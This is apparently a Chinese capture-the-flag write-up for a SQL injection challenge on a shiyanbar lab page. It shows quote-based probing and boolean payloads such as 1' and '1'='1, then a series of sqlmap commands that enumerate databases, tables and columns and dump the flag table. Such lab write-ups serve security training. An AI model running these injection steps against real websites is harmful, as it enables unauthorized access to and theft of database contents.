仍然

1

1’

1”

发现1’报错了。。。。。我觉得作者对’情有独钟

再试试

1#

1’#

1”#

发现都可以正常登录

试试1' and '1'='1和1' and '1'='2发现成功登录和不成功登录的区别在于显示hello不,这里并不会输出id= name=

所以这里应该是个报错型盲注

所以这里就不浪费时间了,直接使用sqlmap

使用

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"

打开开口

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs

查看数据库表名称

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables

查询表下的列名称

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T flag

查询列下的flag类型

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -C flag -T flag --dump

查看flag的信息

最新文章

  1. WPF中弹出菜单
  2. mysql 总结二(自定义函数)
  3. html5中的clip
  4. haproxy.cfg
  5. CXF(2.7.10) - WSDL2Java generated Client
  6. Media Queries for Standard Devices
  7. [置顶] js中如何复制一个对象,如何获取所有属性和属性对应的值
  8. asp.net 开发 sql server 转 oracle
  9. Linux查看非root运行的进程
  10. java基础-jdk工具包
  11. day06深浅拷贝,元组,字典,集合
  12. shell 脚本的编写
  13. 返回JSON格式(二十五)
  14. HBase数据库集群配置【转】
  15. Boost StateChart实现状态机----秒表例程
  16. [Android Security] 如何把java代码转换成smali代码
  17. Max_connect_errors – MySQL性能参数详解
  18. 3D动态人脸识别技术分析——世纪晟人脸识别实现三维人脸建模
  19. 移动应用安全开发指南(Android)--数据存储
  20. 使用axis2进行webservice发布与调用

热门文章

  1. Flink基础概念入门
  2. Elasticsearch:Pinyin 分词器
  3. RDS MySQL内存管理
  4. Zookeeper QuickStart
  5. secureCRT登录ubuntu 报错:`No compatible key-exchange method. The server supports these methods: diffie-hellman`
  6. 多云容器编排 Karmada-Operator 实践
  7. 我操作MySQL的惊险一幕
  8. NOI2015 洛谷P1955 程序自动分析(并查集+离散化)
  9. NOI2011阿狸的打字机
  10. 齐博X1忘记管理员密码了怎么办?如何强制进后台?